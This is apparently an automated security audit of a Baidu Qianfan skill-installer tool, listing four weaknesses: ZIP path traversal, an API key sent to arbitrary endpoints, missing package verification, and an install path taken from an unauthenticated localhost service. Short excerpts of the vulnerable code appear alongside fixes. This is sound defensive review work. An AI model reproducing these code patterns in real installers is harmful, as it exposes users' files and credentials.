qianfan clawhub
WarnAudited by ClawScan on May 10, 2026.
Overview
The skill matches its marketplace purpose, but its installer has unsafe package extraction and credential-routing behavior that users should review before using.
Use this only with a trusted Baidu endpoint, avoid custom --endpoint values unless you fully trust the server, set an explicit safe --workdir, and install only trusted skill slugs until ZIP path validation and package verification are added.
Findings (4)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
A malformed or malicious skill package could place or overwrite files outside the expected Qianfan skills folder under the user's permissions.
The install destination is built from the requested slug and ZIP member names without a visible normalization or bounds check; malicious '..' or absolute paths in a slug or archive could write outside the intended skill directory.
skill_dir = os.path.join(self.skills_dir, slug_name) ... target_path = os.path.join(skill_dir, target_name) ... target_path = os.path.join(skill_dir, name)
Reject slugs and ZIP entries containing absolute paths, '..', drive prefixes, or symlink escapes, and verify each resolved path remains inside the intended skill directory before writing.
If a user or agent uses an untrusted endpoint, the Baidu API key could be disclosed to that server.
The required BAIDU_API_KEY is sent as a Bearer token to whatever endpoint is supplied, while SKILL.md frames the integration as Baidu Cloud services and does not clearly warn about custom endpoints.
parser.add_argument('--endpoint', type=str, default=None, help='指定 API 服务器地址') ... url = f"{self.endpoint}/v2/skills/download" ... headers = {'Authorization': f'Bearer {self.api_key}'}Default to and allowlist the Baidu endpoint, or require explicit user confirmation before sending BAIDU_API_KEY to any custom endpoint.
Users may assume installed skills have been verified when the code appears to rely mainly on the remote response and ZIP parsing.
Downloaded skill packages are trusted and written directly; the reviewed source does not show signature, hash, manifest, or provenance verification despite SKILL.md describing integrated 'verification'.
response = requests.get(url, params=params, headers=headers, timeout=60) ... with zipfile.ZipFile(io.BytesIO(response.content)) as zf: ... dst.write(src.read())
Add package signature or checksum verification and document exactly what is verified before installation.
A local process listening on that port could redirect where downloaded skill files are installed.
When --workdir is not provided, an unauthenticated localhost service can determine the default skills directory, which differs from the documented default-only behavior.
response = requests.get("http://localhost:4096/path", timeout=5) ... json_data = response.json() ... self.skills_dir = os.path.join(json_data['directory'], 'skills')Document this local path lookup, validate the returned path, and consider requiring an explicit --workdir or trusted local service identity before using it.